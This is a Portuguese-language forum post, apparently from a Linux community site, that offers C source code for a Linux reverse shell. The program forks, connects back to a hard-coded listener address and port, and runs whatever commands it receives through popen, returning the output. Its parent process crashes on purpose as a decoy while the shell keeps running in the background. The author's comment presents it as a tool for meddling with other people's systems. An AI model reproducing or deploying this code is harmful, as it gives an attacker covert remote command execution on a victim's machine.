reverse shell na marra!
Publicado por felipe (última atualização em 11/12/2024)
[ Hits: 946 ]
Esse é um programa de reverse shell criado para linux, ele deve ser compilado e executado sem argumentos.
você deve usar o netcat junto, escutado na porta 8000, ou a que você definir, claro, você vai ter que mudar o ip também.
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <arpa/inet.h> #include <netinet/in.h> #include <unistd.h> int main(int argc, char **argv) { //cria um segundo processo pid_t pid; struct sockaddr_in destino={ .sin_family = AF_INET, .sin_port = htons(8000), .sin_addr.s_addr = inet_addr("127.0.0.1") }; //inicia pid = fork(); if(pid < 0){ perror("pid error"); return 1; } if(pid == 0){ int sock = socket(AF_INET, SOCK_STREAM, 0); if(sock < 0){ perror("socket error"); return 1; } int cnx = connect(sock, (struct sockaddr *)&destino, sizeof(destino)); if(cnx < 0){ perror("connet error"); return 1; } //brinca com sistema dos outros =p FILE *cmd; char buf[256]; char rec[256]; char *msg = "shell>"; while(1){ send(sock, msg, strlen(msg), 0); recv(sock, rec, 256, 0); cmd = popen(rec, "r"); while(fgets(buf, 256, cmd) != NULL){ send(sock, buf, strlen(buf), 0); } } } else{ //leve engano //bufferOverFlow int lol = atoi(argv[1]) * atoi(argv[2]); } return 0; }
Exploit para kernel 2.6.12-rc4
Spieluhr - esse código pode ser considerado um vírus?
IntensiveDoS - ferramenta de DoS para pentesting
Criar entrada (menuentry) ISO no Grub
Como gerar qualquer emoji ou símbolo unicode a partir do seu teclado
Instalando o Pi-Hole versão v5.18.4 depois do lançamento da versão v6.0
Instalar o VIM 9.1 no Debian 12
Como saber o range de um IP público?
Muitas dificuldades ao instalar distro Linux em Notebook Sony Vaio PCG-6131L (VPCEA24FM)
Dock do debian está muito pequena (1)
Instalei Windows 11 e não alterou o Grub do Debian (0)
Linux Mint (21.2) não reconhece teclado mecanico RASEC da PCYES (2)